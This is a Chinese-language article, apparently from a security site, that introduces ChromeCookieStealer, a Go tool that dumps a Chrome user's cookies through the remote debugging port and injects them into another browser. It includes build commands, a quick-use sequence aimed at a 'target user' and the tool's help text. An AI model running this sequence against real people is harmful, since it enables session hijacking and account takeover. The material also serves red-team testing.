關于ChromeCookieStealer

ChromeCookieStealer是一款功能強大的Cookie數據收集和注入工具,該工具需要配合Chrome使用,能夠利用Chrome的遠程DevTools(開發者工具)協議實現瀏覽器Cookie的數據收集、注入、清理和刪除操作。

該工具支持使用Chrome自己的格式并以JSON對象形式轉儲Cookie數據,Cookie數據的加載和注入同樣使用的是這類數據格式。

該工具僅供安全研究和測試使用,請勿將其用于其他目的。

功能介紹

1、轉儲Chrome瀏覽器的Cookie數據;
2、將轉儲的Cookie數據注入到其他Chrome實例中;
3、清理Chrome的Cookie數據;
4、編譯過程中支持自定義設置;

工具下載

由于該工具基于Go語言開發,因此我們首先需要在本地設備上安裝并配置好Go語言環境。

接下來,廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/magisterquis/chromecookiestealer.git

然后切換到項目目錄中,使用go build命令構建項目源碼:

cd chromecookiestealer

go build

工具快速使用

構建完成后,執行下列命令即可收集目標用戶Chrome瀏覽器中的Cookie數據:

pkill Chrome

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # 需要根據目標情況修改

./chromecookiestealer -dump ./cookies.json

下列命令可以將轉儲的Cookie數據注入到研究人員的本地瀏覽器中:

# 使用一個調試端口啟動Chrome,具體可參考上面的命令

./chromecookiestealer -clear -inject ./cookies.json

工具幫助信息

Usage: chromecookiestealer [options]

Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)

and, in order and as requested:

 

- Dumps cookies

- Clears cookies

- Injects cookies

- Deletes selected cookies

 

Parameters for cookies to be deleted should be represented as an array of JSON

objects with the following string fields:

 

name   - 要刪除的Cookie名稱

url    -  刪除跟指定域名或URL匹配的所有Cookie

domain - 僅刪除指定域名的Cookie

path   - 僅刪除指定路徑的Cookie

 

Filenames may also be "-" for stdin/stdout.

 

Options:

  -chrome URL

     Chrome遠程調試URL (默認為"ws://127.0.0.1:9222")

  -clear

     清理瀏覽器Cookie

  -delete file

     包含要刪除Cookie參數的文件名稱

  -dump file

     轉儲Cookie的文件名稱

  -inject file

     需要注入的包含Cookie的文件名稱

  -no-summary

     退出時不打印概述信息

  -verbose

     啟用Verbose日志

其他編譯選項

一般情況下,go build命令足夠滿足絕大部分用戶的需求。如果你需要執行更有針對性的安全測試,可以在編譯過程中使用“-ldflags '-X main.Foo=bar'”選項實現自定義配置。

變量

描述

DumpFile

轉儲Cookie的文件名稱,在-dump中設置

InjectFile

需要注入的文件名稱,在-inject中設置

DeleteFile


描述需要刪除Cookie的文件名稱,在-delete中設置


DoClear

是否需要清理Cookie,在-clear中設置


需要注意的是,上述所有的選項/變量默認都是未設置的。

許可證協議

本項目的開發與發布遵循BSD-3-Clause開源許可證協議。

項目地址

ChromeCookieStealer:https://github.com/magisterquis/chromecookiestealer"

參考資料

https://github.com/slyd0g/WhiteChocolateMacademiaNut
https://chromedevtools.github.io/devtools-protocol/tot/Network/#type-Cookie


ChromeCookieStealer
撤稿糾錯
本作品采用《CC 協議》,轉載必須注明作者和本文鏈接